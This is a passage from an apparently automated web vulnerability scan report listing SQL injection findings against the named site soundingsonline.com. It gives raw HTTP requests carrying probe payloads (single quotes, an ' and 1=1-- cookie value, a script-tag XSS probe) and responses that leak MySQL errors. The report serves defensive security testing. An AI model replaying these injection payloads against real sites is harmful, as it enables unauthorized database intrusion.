<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.133. http://www.soundingsonline.com/archives ['"--> parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The '"--></style></script><script>alert(0x001E2B)</script> parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>' HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2autr3bra1c4n8hi6pofo0fot1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

1.134. http://www.soundingsonline.com/archives ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.135. http://www.soundingsonline.com/archives [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=90plqvgiq64ahge1urijnrrll5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

Request 2

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)''
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.136. http://www.soundingsonline.com/archives [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=f953kv0sgtapd396agsosf0ie5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

Request 2

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.137. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1' AND c' at line 1</font>
...[SNIP]...

1.138. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.139. http://www.soundingsonline.com/archives [s_lv_s cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the s_lv_s cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit'%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

1.140. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.141. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.142. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
